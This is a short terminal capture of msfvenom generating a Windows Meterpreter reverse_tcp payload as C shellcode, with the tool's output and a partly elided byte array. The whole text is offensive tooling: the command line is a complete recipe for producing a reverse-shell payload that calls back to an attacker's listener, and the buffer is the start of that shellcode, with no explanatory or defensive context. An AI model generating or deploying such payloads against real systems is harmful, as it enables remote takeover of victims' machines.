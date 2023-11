$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=eth0 LPORT=444-f c

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload

No encoder specified, outputting raw payload

Payload size: 354 bytes

Final size of c file: 1518 bytes

unsigned char buf[] =

"\xfc\xe8\x8f\x00\x00\x00\x60\x31\xd2\x64\x8b\x52\x30\x89"

"\xe5\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26"

...

"\x5e\xff\x0c\x24\x0f\x85\x70\xff\xff\xff\xe9\x9b\xff\xff"

"\xff\x01\xc3\x29\xc6\x75\xc1\xc3\xbb\xf0\xb5\xa2\x56\x6a"

"\x00\x53\xff\xd5";